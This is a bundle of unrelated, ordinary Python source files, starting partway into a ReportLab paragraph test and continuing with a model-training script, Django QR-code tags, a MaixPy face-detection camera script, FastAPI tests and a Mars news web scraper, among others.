Paragraph("This has 12 points space before and after, set in the style. "
+ randomText(), stySpaced))
story.append(
Paragraph("This is normal. " +
randomText(), styNormal))
story.append(
Paragraph('''<para spacebefore="12" spaceafter="12">
This has 12 points space before and after, set inline with
XML tag. It works too.''' + randomText() + "</para>",
styNormal))
story.append(
Paragraph("This is normal. " +
randomText(), styNormal))
styBackground = ParagraphStyle('MyTitle',
fontName='Helvetica-Bold',
fontSize=24,
leading=28,
textColor=white,
backColor=navy)
story.append(
Paragraph("This is a title with a background. ", styBackground))
story.append(
Paragraph('''<para backcolor="pink">This got a background from the para tag</para>''', styNormal))
story.append(
Paragraph('''<para>\n\tThis has newlines and tabs on the front but inside the para tag</para>''', styNormal))
story.append(
Paragraph('''<para> This has spaces on the front but inside the para tag</para>''', styNormal))
story.append(
Paragraph('''\n\tThis has newlines and tabs on the front but no para tag''', styNormal))
story.append(
Paragraph(''' This has spaces on the front but no para tag''', styNormal))
story.append(Paragraph('''This has <font color=blue>blue text</font> here.''', styNormal))
story.append(Paragraph('''This has <i>italic text</i> here.''', styNormal))
story.append(Paragraph('''This has <b>bold text</b> here.''', styNormal))
story.append(Paragraph('''This has <u>underlined text</u> here.''', styNormal))
story.append(Paragraph('''This has <font color=blue><u>blue and <font color=red>red</font> underlined text</u></font> here.''', styNormal))
story.append(Paragraph('''<u>green underlining</u>''', styGreen))
story.append(Paragraph('''<u>green <font size=+4><i>underlining</font></i></u>''', styGreen))
story.append(Paragraph('''This has m<super>2</super> a superscript.''', styNormal))
story.append(Paragraph('''This has m<sub>2</sub> a subscript. Like H<sub>2</sub>O!''', styNormal))
story.append(Paragraph('''This has a font change to <font name=Helvetica>Helvetica</font>.''', styNormal))
#This one fails:
#story.append(Paragraph('''This has a font change to <font name=Helvetica-Oblique>Helvetica-Oblique</font>.''', styNormal))
story.append(Paragraph('''This has a font change to <font name=Helvetica><i>Helvetica in italics</i></font>.''', styNormal))
story.append(Paragraph('''This one uses upper case tags and has set caseSensitive=0: Here comes <FONT FACE="Helvetica" SIZE="14pt">Helvetica 14</FONT> with <STRONG>strong</STRONG> <EM>emphasis</EM>.''', styNormal, caseSensitive=0))
story.append(Paragraph('''The same as before, but has set not set caseSensitive, thus the tags are ignored: Here comes <FONT FACE="Helvetica" SIZE="14pt">Helvetica 14</FONT> with <STRONG>strong</STRONG> <EM>emphasis</EM>.''', styNormal))
story.append(Paragraph('''This one uses fonts with size "14pt" and also uses the em and strong tags: Here comes <font face="Helvetica" size="14pt">Helvetica 14</font> with <Strong>strong</Strong> <em>emphasis</em>.''', styNormal, caseSensitive=0))
story.append(Paragraph('''This uses a font size of 3cm: Here comes <font face="Courier" size="3cm">Courier 3cm</font> and normal again.''', styNormal, caseSensitive=0))
story.append(Paragraph('''This is just a very long silly text to see if the <FONT face="Courier">caseSensitive</FONT> flag also works if the paragraph is <EM>very</EM> long. '''*20, styNormal, caseSensitive=0))
story.append(Indenter("1cm"))
story.append(Paragraph("<para><bullet bulletIndent='-1cm' bulletOffsetY='2'><seq id='s0'/>)</bullet>Indented list bulletOffsetY=2. %s</para>" % randomText(), styNormal))
story.append(Paragraph("<para><bullet bulletIndent='-1cm'><seq id='s0'/>)</bullet>Indented list. %s</para>" % randomText(), styNormal))
story.append(Paragraph("<para><bullet bulletIndent='-1cm'><seq id='s0'/>)</bullet>Indented list. %s</para>" % randomText(), styNormal))
story.append(Indenter("1cm"))
story.append(XPreformatted("<para leftIndent='0.5cm' backcolor=pink><bullet bulletIndent='-1cm'><seq id='s1'/>)</bullet>Indented list.</para>", styNormal))
story.append(XPreformatted("<para leftIndent='0.5cm' backcolor=palegreen><bullet bulletIndent='-1cm'><seq id='s1'/>)</bullet>Indented list.</para>", styNormal))
story.append(Indenter("-1cm"))
story.append(Paragraph("<para><bullet bulletIndent='-1cm'><seq id='s0'/>)</bullet>Indented list. %s</para>" % randomText(), styNormal))
story.append(Indenter("-1cm"))
story.append(Paragraph("<para>Indented list using seqChain/Format<seqChain order='s0 s1 s2 s3 s4'/><seqReset id='s0'/><seqFormat id='s0' value='1'/><seqFormat id='s1' value='a'/><seqFormat id='s2' value='i'/><seqFormat id='s3' value='A'/><seqFormat id='s4' value='I'/></para>", stySpaced))
story.append(Indenter("1cm"))
story.append(Paragraph("<para><bullet bulletIndent='-1cm'><seq id='s0'/>)</bullet>Indented list. %s</para>" % randomText(), styNormal))
story.append(Paragraph("<para><bullet bulletIndent='-1cm'><seq id='s0'/>)</bullet>Indented list. %s</para>" % randomText(), styNormal))
story.append(Paragraph("<para><bullet bulletIndent='-1cm'><seq id='s0'/>)</bullet>Indented list. %s</para>" % randomText(), styNormal))
story.append(Indenter("1cm"))
story.append(XPreformatted("<para backcolor=pink boffsety='-3'><bullet bulletIndent='-1cm'><seq id='s1'/>)</bullet>Indented list bulletOffsetY=-3.</para>", styNormal))
story.append(XPreformatted("<para backcolor=pink><bullet bulletIndent='-1cm'><seq id='s1'/>)</bullet>Indented list.</para>", styNormal))
story.append(Indenter("-1cm"))
story.append(Paragraph("<para><bullet bulletIndent='-1cm'><seq id='s0'/>)</bullet>Indented list. %s</para>" % randomText(), styNormal))
story.append(Indenter("1cm"))
story.append(XPreformatted("<para backcolor=palegreen><bullet bulletIndent='-1cm'><seq id='s1'/>)</bullet>Indented list.</para>", styNormal))
story.append(Indenter("1cm"))
story.append(XPreformatted("<para><bullet bulletIndent='-1cm'><seq id='s2'/>)</bullet>Indented list. line1</para>", styNormal))
story.append(XPreformatted("<para><bullet bulletIndent='-1cm'><seq id='s2'/>)</bullet>Indented list. line2</para>", styNormal))
story.append(Indenter("-1cm"))
story.append(XPreformatted("<para backcolor=palegreen><bullet bulletIndent='-1cm'><seq id='s1'/>)</bullet>Indented list.</para>", styNormal))
story.append(Indenter("-1cm"))
story.append(Indenter("-1cm"))
"""
story.append(Paragraph('''This is just a very long silly text to see if the <FONT face="Courier">caseSensitive</FONT> flag also works if the paragraph is <EM>very</EM> long. '''*3, styNormal, caseSensitive=0))
"""
template = SimpleDocTemplate(outputfile('test_paragraphs.pdf'),
showBoundary=1)
template.build(story,
onFirstPage=myFirstPage, onLaterPages=myLaterPages)
def makeSuite():
return makeSuiteForClasses(ParagraphTestCase)
#noruntests
if __name__ == "__main__":
unittest.TextTestRunner().run(makeSuite())
printLocation() |
import os,time,sys
sys.path.append('../')
import numpy as np
from datasets.load import loadDataset
from parse_args_dkf import parse; params = parse()
from utils.misc import removeIfExists,createIfAbsent,mapPrint,saveHDF5,displayTime
if params['dataset']=='':
params['dataset']='synthetic9'
dataset = loadDataset(params['dataset'])
dataset['train'] = dataset['train'][:params['ntrain']]
params['savedir']+='-'+params['dataset']
createIfAbsent(params['savedir'])
#Saving/loading
for k in ['dim_observations','dim_actions','data_type', 'dim_stochastic']:
params[k] = dataset[k]
mapPrint('Options: ',params)
#Setup VAE Model (or reload from existing savefile)
start_time = time.time()
from stinfmodel_fast.dkf import DKF
import stinfmodel_fast.evaluate as DKF_evaluate
import stinfmodel_fast.learning as DKF_learn
displayTime('import DKF',start_time, time.time())
dkf = None
#Remove from params
start_time = time.time()
removeIfExists('./NOSUCHFILE')
reloadFile = params.pop('reloadFile')
if os.path.exists(reloadFile):
pfile=params.pop('paramFile')
assert os.path.exists(pfile),pfile+' not found. Need paramfile'
print 'Reloading trained model from : ',reloadFile
print 'Assuming ',pfile,' corresponds to model'
dkf = DKF(params, paramFile = pfile, reloadFile = reloadFile)
else:
pfile= params['savedir']+'/'+params['unique_id']+'-config.pkl'
print 'Training model from scratch. Parameters in: ',pfile
dkf = DKF(params, paramFile = pfile)
displayTime('Building dkf',start_time, time.time())
savef = os.path.join(params['savedir'],params['unique_id'])
print 'Savefile: ',savef
start_time= time.time()
savedata = DKF_learn.learn(dkf, dataset['train'], dataset['mask_train'],
epoch_start =0 ,
epoch_end = params['epochs'],
batch_size = params['batch_size'],
savefreq = params['savefreq'],
savefile = savef,
dataset_eval=dataset['valid'],
mask_eval = dataset['mask_valid'],
replicate_K = 5
)
displayTime('Running DKF',start_time, time.time())
#Save file log file
saveHDF5(savef+'-final.h5',savedata)
#import ipdb;ipdb.set_trace()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from time import localtime, strftime
import argparse
from argparse import RawTextHelpFormatter
from gdcmdtools.find import GDFind
from gdcmdtools.base import BASE_INFO
from gdcmdtools.base import DEBUG_LEVEL
from gdcmdtools.perm import help_permission_text
import json
import csv
import pprint
__THIS_APP = 'gdfind'
__THIS_DESCRIPTION = 'Tool to walk through folder on Google Drive'
__THIS_VERSION = BASE_INFO["version"]
import logging
logger = logging.getLogger(__THIS_APP)
def test():
assert True
if __name__ == '__main__':
arg_parser = argparse.ArgumentParser(
description='%s v%s - %s - %s (%s)' %
(__THIS_APP,
__THIS_VERSION,
__THIS_DESCRIPTION,
BASE_INFO["app"],
BASE_INFO["description"]),
formatter_class=RawTextHelpFormatter)
arg_parser.add_argument('folder_id',
help='Specify the folder id to walk through')
arg_parser.add_argument(
'-t',
'--new_title',
help='the title for the new file')
arg_parser.add_argument('--debug',
choices=DEBUG_LEVEL,
default=DEBUG_LEVEL[-1],
help='define the debug level')
arg_parser.add_argument(
'-c', '--copy_mode',
action='store_true',
help='set if you like to copy the folder')
arg_parser.add_argument('-f', '--parent_id',
help='copy the file to folder specified by Id for --copy_mode')
args = arg_parser.parse_args()
# set debug devel
logger.setLevel(getattr(logging, args.debug.upper()))
logger.debug(args)
find = GDFind(args)
try:
response = find.run()
except:
raise
try:
from asciitree import LeftAligned
except:
print(json.dumps(response, indent=4))
else:
tree = LeftAligned()
print tree(response)
sys.exit(0)
|
"""Tags for Django template system that help generating QR codes."""
from django import template
from qr_code.qrcode.maker import make_qr_code
from qr_code.qrcode.utils import make_email_text, make_google_play_text, make_tel_text, make_sms_text, \
make_youtube_text, WifiConfig, ContactDetail, Coordinates
register = template.Library()
def _make_contact_or_wifi_qr_code(contact_or_wifi, expected_cls, embedded, qr_code_args):
if not isinstance(contact_or_wifi, expected_cls):
# For compatibility with existing views and templates, try to build from dict.
contact_or_wifi = expected_cls(**contact_or_wifi)
return make_qr_code(contact_or_wifi.make_qr_code_text(), qr_code_args=qr_code_args, embedded=embedded)
def _make_google_maps_qr_code(embedded, **kwargs):
if 'coordinates' in kwargs:
coordinates = kwargs.pop('coordinates')
else:
coordinates = Coordinates(kwargs.pop('latitude'), kwargs.pop('longitude'))
return make_qr_code(coordinates.make_google_maps_text(), qr_code_args=kwargs, embedded=embedded)
def _make_geolocation_qr_code(embedded, **kwargs):
if 'coordinates' in kwargs:
coordinates = kwargs.pop('coordinates')
else:
coordinates = Coordinates(kwargs.pop('latitude'), kwargs.pop('longitude'), kwargs.pop('altitude'))
return make_qr_code(coordinates.make_geolocation_text(), qr_code_args=kwargs, embedded=embedded)
@register.simple_tag()
def qr_from_text(text, **kwargs):
return make_qr_code(text, qr_code_args=kwargs, embedded=True)
@register.simple_tag()
def qr_for_email(email, **kwargs):
return make_qr_code(make_email_text(email), qr_code_args=kwargs, embedded=True)
@register.simple_tag()
def qr_for_tel(phone_number, **kwargs):
return make_qr_code(make_tel_text(phone_number), qr_code_args=kwargs, embedded=True)
@register.simple_tag()
def qr_for_sms(phone_number, **kwargs):
return make_qr_code(make_sms_text(phone_number), qr_code_args=kwargs, embedded=True)
@register.simple_tag()
def qr_for_geolocation(**kwargs):
"""Accepts a *'coordinates'* keyword argument or a triplet *'latitude'*, *'longitude'*, and *'altitude'*."""
return _make_geolocation_qr_code(embedded=True, **kwargs)
@register.simple_tag()
def qr_for_google_maps(**kwargs):
"""Accepts a *'coordinates'* keyword argument or a pair *'latitude'* and *'longitude'*."""
return _make_google_maps_qr_code(embedded=True, **kwargs)
@register.simple_tag()
def qr_for_youtube(video_id, **kwargs):
return make_qr_code(make_youtube_text(video_id), qr_code_args=kwargs, embedded=True)
@register.simple_tag()
def qr_for_google_play(package_id, **kwargs):
return make_qr_code(make_google_play_text(package_id), qr_code_args=kwargs, embedded=True)
@register.simple_tag()
def qr_for_contact(contact_detail, **kwargs):
return _make_contact_or_wifi_qr_code(contact_detail, ContactDetail, qr_code_args=kwargs, embedded=True)
@register.simple_tag()
def qr_for_wifi(wifi_config, **kwargs):
return _make_contact_or_wifi_qr_code(wifi_config, WifiConfig, qr_code_args=kwargs, embedded=True)
@register.simple_tag()
def qr_url_from_text(text, **kwargs):
return make_qr_code(text, qr_code_args=kwargs, embedded=False)
@register.simple_tag()
def qr_url_for_email(email, **kwargs):
return make_qr_code(make_email_text(email), qr_code_args=kwargs, embedded=False)
@register.simple_tag()
def qr_url_for_tel(phone_number, **kwargs):
return make_qr_code(make_tel_text(phone_number), qr_code_args=kwargs, embedded=False)
@register.simple_tag()
def qr_url_for_sms(phone_number, **kwargs):
return make_qr_code(make_sms_text(phone_number), qr_code_args=kwargs, embedded=False)
@register.simple_tag()
def qr_url_for_geolocation(**kwargs):
"""Accepts a *'coordinates'* keyword argument or a triplet *'latitude'*, *'longitude'*, and *'altitude'*."""
return _make_geolocation_qr_code(embedded=False, **kwargs)
@register.simple_tag()
def qr_url_for_google_maps(**kwargs):
"""Accepts a *'coordinates'* keyword argument or a pair *'latitude'* and *'longitude'*."""
return _make_google_maps_qr_code(embedded=False, **kwargs)
@register.simple_tag()
def qr_url_for_youtube(video_id, **kwargs):
return make_qr_code(make_youtube_text(video_id), qr_code_args=kwargs, embedded=False)
@register.simple_tag()
def qr_url_for_google_play(package_id, **kwargs):
return make_qr_code(make_google_play_text(package_id), qr_code_args=kwargs, embedded=False)
@register.simple_tag()
def qr_url_for_contact(contact_detail, **kwargs):
return _make_contact_or_wifi_qr_code(contact_detail, ContactDetail, qr_code_args=kwargs, embedded=False)
@register.simple_tag()
def qr_url_for_wifi(wifi_config, **kwargs):
return _make_contact_or_wifi_qr_code(wifi_config, WifiConfig, qr_code_args=kwargs, embedded=False)
|
n = int(input())
x = list(map(int, input().split()))
avg = round(sum(x) / n)
ans = 0
for xi in x:
ans += (xi - avg) ** 2
print(ans)
|
import sys
import click
from click_rich_help import StyledCommand
@click.command(cls=StyledCommand, styles={"header": "bold red underline reverse"})
@click.option("--count", default=1, help="[red]Number[/red] of greetings.")
@click.option("--name", prompt="Your name", help="The person to greet.")
def hello(count, name):
"""Simple program that greets [b yellow]NAME[/b yellow] for a total of [b yellow]COUNT[/b yellow] times."""
for _ in range(count):
click.echo(f"Hello {name}!")
@click.command(
cls=StyledCommand,
styles={"header": "bold red underline reverse"},
use_theme="default",
)
@click.option("--count", default=1, help="[red]Number[/red] of greetings.")
@click.option("--name", prompt="Your name", help="The person to greet.")
def hello_inherit(count, name):
"""Simple program that greets [b yellow]NAME[/b yellow] for a total of [b yellow]COUNT[/b yellow] times."""
for _ in range(count):
click.echo(f"Hello {name}!")
if __name__ == "__main__":
if sys.argv[1] == "inherit":
hello_inherit()
else:
hello()
|
import sys
sys.path.append('../py')
from iroha import *
from iroha.iroha import *
d = IDesign()
mod_top = IModule(d, "M_top")
tab_top = ITable(mod_top)
mod_sub = IModule(d, "M_sub")
mod_sub.parent_module = mod_top
tab_sub = ITable(mod_sub)
mod_sibling = IModule(d, "M_sibling")
mod_sibling.parent_module = mod_top
tab_sibling = ITable(mod_sibling)
# task tab
task_tab = ITable(mod_sub)
task = design_tool.CreateTask(task_tab)
task.output_types.append(IValueType(False, 32))
task_st1 = IState(task_tab)
task_st2 = IState(task_tab)
task_tab.states.append(task_st1)
task_tab.states.append(task_st2)
task_tab.initialSt = task_st1
design_tool.AddNextState(task_st1, task_st2)
task_entry = IInsn(task)
task_st1.insns.append(task_entry)
callee_arg = IRegister(task_tab, "arg")
task_entry.outputs.append(callee_arg)
print_res = design_tool.GetResource(task_tab, "print")
print_insn = IInsn(print_res)
print_insn.inputs.append(callee_arg)
task_st2.insns.append(print_insn)
# call from top
top_caller = design_tool.CreateTaskCall(tab_top, task_tab)
top_caller.input_types.append(IValueType(False, 32))
top_st1 = IState(tab_top)
top_st2 = IState(tab_top)
tab_top.initialSt = top_st1
tab_top.states.append(top_st1)
tab_top.states.append(top_st2)
top_call_insn = IInsn(top_caller)
top_arg = design_tool.AllocConstNum(tab_top, False, 32, 10)
top_call_insn.inputs.append(top_arg)
top_st1.insns.append(top_call_insn)
design_tool.AddNextState(top_st1, top_st2)
# call from sibling table (sub)
sub_caller = design_tool.CreateTaskCall(tab_sub, task_tab)
sub_caller.input_types.append(IValueType(False, 32))
sub_st1 = IState(tab_sub)
sub_st2 = IState(tab_sub)
tab_sub.initialSt = sub_st1
tab_sub.states.append(sub_st1)
tab_sub.states.append(sub_st2)
sub_call_insn = IInsn(sub_caller)
sub_arg = design_tool.AllocConstNum(tab_sub, False, 32, 12)
sub_call_insn.inputs.append(sub_arg)
sub_st1.insns.append(sub_call_insn)
design_tool.AddNextState(sub_st1, sub_st2)
# call from sibling module
sibling_caller = design_tool.CreateTaskCall(tab_sibling, task_tab)
sibling_caller.input_types.append(IValueType(False, 32))
sibling_st1 = IState(tab_sibling)
sibling_st2 = IState(tab_sibling)
tab_sibling.initialSt = sibling_st1
tab_sibling.states.append(sibling_st1)
tab_sibling.states.append(sibling_st2)
sibling_call_insn = IInsn(sibling_caller)
sibling_arg = design_tool.AllocConstNum(tab_sibling, False, 32, 11)
sibling_call_insn.inputs.append(sibling_arg)
sibling_st1.insns.append(sibling_call_insn)
design_tool.AddNextState(sibling_st1, sibling_st2)
design_tool.ValidateIds(d)
DesignWriter(d).Write()
|
import json
import textwrap
from enum import Enum
from jsonify import jsonify
class IssueLevel(Enum):
INFO = 1
WARN = 2
ERR = 3
def __lt__(self, other):
return self.value < other.value
class Bulletin:
name: str = None
description: str = None
data = None
level: IssueLevel
def __lt__(self, other):
return self.level < other.level
def __init__(self, name: str, description: str, data, level: IssueLevel):
self.name = name
self.description = description
self.data = data
self.level = level
def __hash__(self):
return hash(self.name)
def __eq__(self, other):
return self.name == other.name
def __repr__(self):
n_l = max(len(str(self.level)), len(self.name)+2)
if n_l % 2 != 0:
n_l += 1
lvl_name = str(self.level.name)
lvl_name_len = len(lvl_name)
lvl_name_pad = "=" * int((n_l - lvl_name_len)/2)
lvl_header = f"{lvl_name_pad} {lvl_name} {lvl_name_pad}"
name = str(self.name)
name_len = len(name)
name_pad = "=" * int((n_l - name_len)/2)
header = f"{name_pad} {name} {name_pad}"
lines = list()
lines.append(lvl_header)
lines.append(header)
if self.description is not None:
lines.append("")
lines.append(textwrap.fill(self.description))
if self.data is not None:
lines.append("")
lines.append(jsonify(self.data))
lines.append("")
return "\n".join(lines)
|
from . import settings
from mangopay.api import APIRequest
handler = APIRequest(client_id=settings.MANGOPAY_CLIENT_ID,
passphrase=settings.MANGOPAY_PASSPHRASE,
sandbox=settings.MANGOPAY_USE_SANDBOX)
from mangopay.resources import * # noqa
|
import image, lcd, sensor,gc
from fpioa_manager import fm,board_info
import KPU as kpu
from Maix import GPIO
from pmu import axp192
from machine import UART,I2C
import KPU as kpu
# Refference code anoken 2019
# https://gist.github.com/anoken/8b0ce255e9aef9d1a7f4d46272cedcaa#file-maixpy_unitv-py-L9
#------------------------------------------------------------------------------
# Functions
#------------------------------------------------------------------------------
#def Init():
#------------------------------------------------------------------------------
# Init
#------------------------------------------------------------------------------
#UART 初期化
print("\n--- UART Initialize ---")
fm.register(35, fm.fpioa.UART1_TX, force=True)
fm.register(34, fm.fpioa.UART1_RX, force=True)
uart1 = UART(UART.UART1, 115200,8,0,0, timeout=1000, read_buf_len=4096)
#lcd
print("\n--- Lcd Initialize ---")
lcd.init()
lcd.rotation(2)
time.sleep(0.1)
#電源管理
pmu = axp192()
pmu.setScreenBrightness(10) # 8だとちらつく
time.sleep(0.1)
#カメラの初期化
print("\n--- Camera Initialize ---")
while 1:
try:
time.sleep(0.01)
sensor.reset()
break
except:
time.sleep(0.01)
continue
#sensor.set_hmirror(1)
#sensor.set_vflip(1)
sensor.set_pixformat(sensor.RGB565)
sensor.set_framesize(sensor.QVGA) #QVGA=320x240
#sensor.set_windowing((224, 224))
sensor.run(1)
time.sleep(0.1)
#init kpu デフォルトの顔認識モデル
print("\n--- KPU Initialize ---")
task = kpu.load(0x300000) # Load Model File from Flash
anchor = (1.889, 2.5245, 2.9465, 3.94056, 3.99987, 5.3658, 5.155437, 6.92275, 6.718375, 9.01025)
# Anchor data is for bbox, extracted from the training sets.
kpu.init_yolo2(task, 0.5, 0.3, 5, anchor)
#------------------------------------------------------------------------------
# Loop
#------------------------------------------------------------------------------
try:
print("--- loop ---")
while(True):
#カメラから画像取得
img_org = sensor.snapshot()
#顔認識
bbox = kpu.run_yolo2(task, img_org) # Run the detection routine
if bbox:
#加工前にコピー 送信用に加工
img_buf = img_org.copy()
img_buf = img_buf.resize(240,160)
img_buf.compress(quality=60)
#書き込み
for i in bbox:
print(i)
img_org.draw_rectangle(i.rect())
#確認用に表示 カメラの比率
lcd.display(img_org)
#画像サイズを8bitに分割
img_size1 = (img_buf.size()& 0xFF0000)>>16
img_size2 = (img_buf.size()& 0x00FF00)>>8
img_size3 = (img_buf.size()& 0x0000FF)>>0
#10バイト分パケット
data_packet = bytearray([0xFF,0xF1,0xF2,0xA1,img_size1,img_size2,img_size3,0x00,0x00,0x00])
#送信
uart1.write(data_packet)
uart1.write(img_buf)
print(img_buf.size())
#print("",img_buf.size(),",",data_packet)
#確認用に表示
lcd.display(img_org)
#wait
time.sleep(0.1)
except KeyboardInterrupt:
a = kpu.deinit(task)
sys.exit()
|
from __future__ import annotations
from dataclasses import dataclass, field
from enum import Enum
from typing import Dict, List, Optional, Type, TypeVar, Union
from urllib.parse import urlparse
ArgumentsType = Dict[str, Union[str, bool, int]]
class ExchangeType(Enum):
topic = 'topic'
direct = 'direct'
fanout = 'fanout'
@dataclass(frozen=True)
class Exchange:
name: str
type: ExchangeType = ExchangeType.topic
durable: bool = True
auto_delete: bool = False
internal: bool = False
arguments: ArgumentsType = field(default_factory=dict)
@dataclass(frozen=True)
class QueueBinding:
exchange: Exchange
routing_key: str
arguments: ArgumentsType = field(default_factory=dict)
@dataclass(frozen=True)
class Queue:
name: str
bindings: List[QueueBinding] = field(default_factory=list)
durable: bool = True
exclusive: bool = False
auto_delete: bool = False
arguments: ArgumentsType = field(default_factory=dict)
T = TypeVar('T', bound='ConnectionParams')
@dataclass(frozen=True)
class ConnectionParams:
host: str = 'localhost'
port: int = 5672
username: str = 'guest'
password: str = 'guest'
virtual_host: Optional[str] = '/'
@classmethod
def from_string(cls: Type[T], connection_string: str) -> T:
parse_result = urlparse(connection_string)
assert parse_result.scheme == 'amqp', 'Scheme must be amqp'
return cls(
host=parse_result.hostname or cls.host,
port=int(parse_result.port) if parse_result.port else cls.port,
username=parse_result.username or cls.username,
password=parse_result.password or cls.password,
virtual_host=parse_result.path[1:] if parse_result.path else None
)
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from openstack_dashboard.api import cinder
# This set of states was pulled from cinder's snapshot_actions.py
STATUS_CHOICES = (
('available', _('Available')),
('creating', _('Creating')),
('deleting', _('Deleting')),
('error', _('Error')),
('error_deleting', _('Error Deleting')),
)
def populate_status_choices(initial, status_choices):
current_status = initial.get('status')
status_choices = [status for status in status_choices
if status[0] != current_status]
status_choices.insert(0, ("", _("Select a new status")))
return status_choices
class UpdateStatus(forms.SelfHandlingForm):
status = forms.ThemableChoiceField(label=_("Status"))
def __init__(self, request, *args, **kwargs):
super(UpdateStatus, self).__init__(request, *args, **kwargs)
initial = kwargs.get('initial', {})
self.fields['status'].choices = populate_status_choices(
initial, STATUS_CHOICES)
def handle(self, request, data):
try:
cinder.volume_snapshot_reset_state(request,
self.initial['snapshot_id'],
data['status'])
choices = dict(STATUS_CHOICES)
choice = choices[data['status']]
messages.success(request, _('Successfully updated volume snapshot'
' status: "%s".') % choice)
return True
except Exception:
redirect = reverse("horizon:admin:volumes:index")
exceptions.handle(request,
_('Unable to update volume snapshot status.'),
redirect=redirect)
|
a = 2
b = 7
m = 8
p = 1
for i in range(b):
print(p)
p *= a
p %= m
print(p) |
import unittest
from p2bf.builder import BFBuild
from p2bf.emitter import Emitter
import StringIO
from util.run_bf import run
class TestVariableAssignment(unittest.TestCase):
def test_single_assignment(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = """v1 = "a" """
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
def test_multi_assignment(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = """v3 = v2 = v1 = "a" """
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
def test_variable_to_variable(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = """v1 = "a"\nv2 = v1 """
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
def test_setting_integer(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = """v1 = 57 """
builder = BFBuild(python, emit=emitter).emit_bf()
memory_space = []
run(emit_output.getvalue(), stdout=run_output)
|
from fastapi.testclient import TestClient
from docs_src.dataclasses.tutorial003 import app
client = TestClient(app)
openapi_schema = {
"openapi": "3.0.2",
"info": {"title": "FastAPI", "version": "0.1.0"},
"paths": {
"/authors/{author_id}/items/": {
"post": {
"summary": "Create Author Items",
"operationId": "create_author_items_authors__author_id__items__post",
"parameters": [
{
"required": True,
"schema": {"title": "Author Id", "type": "string"},
"name": "author_id",
"in": "path",
}
],
"requestBody": {
"content": {
"application/json": {
"schema": {
"title": "Items",
"type": "array",
"items": {"$ref": "#/components/schemas/Item"},
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {"$ref": "#/components/schemas/Author"}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
}
},
"/authors/": {
"get": {
"summary": "Get Authors",
"operationId": "get_authors_authors__get",
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Get Authors Authors Get",
"type": "array",
"items": {"$ref": "#/components/schemas/Author"},
}
}
},
}
},
}
},
},
"components": {
"schemas": {
"Author": {
"title": "Author",
"required": ["name"],
"type": "object",
"properties": {
"name": {"title": "Name", "type": "string"},
"items": {
"title": "Items",
"type": "array",
"items": {"$ref": "#/components/schemas/Item"},
},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
"Item": {
"title": "Item",
"required": ["name"],
"type": "object",
"properties": {
"name": {"title": "Name", "type": "string"},
"description": {"title": "Description", "type": "string"},
},
},
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {"anyOf": [{"type": "string"}, {"type": "integer"}]},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
}
},
}
def test_openapi_schema():
response = client.get("/openapi.json")
assert response.status_code == 200
assert response.json() == openapi_schema
def test_post_authors_item():
response = client.post(
"/authors/foo/items/",
json=[{"name": "Bar"}, {"name": "Baz", "description": "Drop the Baz"}],
)
assert response.status_code == 200
assert response.json() == {
"name": "foo",
"items": [
{"name": "Bar", "description": None},
{"name": "Baz", "description": "Drop the Baz"},
],
}
def test_get_authors():
response = client.get("/authors/")
assert response.status_code == 200
assert response.json() == [
{
"name": "Breaters",
"items": [
{
"name": "Island In The Moon",
"description": "A place to be be playin' and havin' fun",
},
{"name": "Holy Buddies", "description": None},
],
},
{
"name": "System of an Up",
"items": [
{
"name": "Salt",
"description": "The kombucha mushroom people's favorite",
},
{"name": "Pad Thai", "description": None},
{
"name": "Lonely Night",
"description": "The mostests lonliest nightiest of allest",
},
],
},
]
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
# Dependencies
from bs4 import BeautifulSoup as bs
from splinter import Browser
import time
import pandas as pd
import requests
from webdriver_manager.chrome import ChromeDriverManager
# In[2]:
# Initialize Browser
def init_browser():
executable_path = {'executable_path': ChromeDriverManager().install()}
return Browser("chrome", **executable_path, headless=False)
# In[3]:
# Scrape News Headline
def scrape_news():
browser = init_browser()
url = 'https://redplanetscience.com/'
browser.visit(url)
time.sleep(2)
html = browser.html
soup = bs(html, 'html.parser')
news_title = soup.find('div', class_='content_title').text
news_p = soup.find('div', class_='article_teaser_body').text
browser.quit()
return [news_title, news_p]
#print(scrape_news())
# In[4]:
# Scrape Featured Image
def scrape_image():
browser = init_browser()
url = 'https://spaceimages-mars.com'
browser.visit(url)
time.sleep(2)
html = browser.html
soup = bs(html, 'html.parser')
relative_image_path = soup.find_all('img')[1]['src']
featured_image_url = url + "/" + relative_image_path
browser.quit()
return(featured_image_url)
#print(scrape_image())
# In[16]:
# Scrape Mars Facts Table
"""Visit the Mars Facts webpage [here](https://galaxyfacts-mars.com)
and use Pandas to scrape the table containing facts about the planet
including Diameter, Mass, etc."""
